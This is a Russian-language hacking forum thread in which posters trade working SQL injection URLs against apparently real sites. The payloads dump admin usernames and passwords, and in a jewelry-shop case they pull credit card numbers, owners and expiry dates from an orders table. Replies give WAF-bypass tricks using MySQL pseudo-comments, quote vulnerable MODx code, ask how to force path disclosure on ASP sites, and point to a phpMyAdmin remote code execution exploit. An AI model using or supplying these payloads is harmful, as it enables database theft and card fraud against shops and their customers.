http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+concat_ws(0x3a,id,name,password),2+from+adminUsers+--+
http://www.site.com/info.php?id=1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт Forbidden You don't have permission to access /info.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
Вот нашел на хакер.ру уязвимость: Помогите скулю раскрутить, а то что-то не получается. Вот пример сайта на этой CMS: http://bobsguides.com/manager/index.php?id=4&a=16
Инъекция есть... Но чтобы ее использовать надо как минимум 1) доступ в админку 2) magic_quotes = Off mutate_templates.dynamic.php PHP: if ($_REQUEST['a'] == 16) { $sql = "SELECT tv.name as 'name', tv.id as 'id', tr.templateid, tr.rank, if(isnull(cat.category),'".$_lang['no_category']."',cat.category) as category FROM ".$modx->getFullTableName('site_tmplvar_templates')." tr INNER JOIN ".$modx->getFullTableName('site_tmplvars')." tv ON tv.id = tr.tmplvarid LEFT JOIN ".$modx->getFullTableName('categories')." cat ON tv.category = cat.id WHERE tr.templateid='".$_REQUEST['id']."' ORDER BY tr.rank ASC"; $rs = $modx->db->query($sql);
вот что получилось http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1-- выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс? зы голова не соображает ладно "утро вечера мудренее"
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt+concat_ws(0x3a,cc_type,cc_number,cc_owner,cc_expires),2,3,4+from+orders+limit+0,1*/+--+ Если принтабельна первая колонка И не извращайся с псевдокомментами, хватит одного для обхода WAF
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/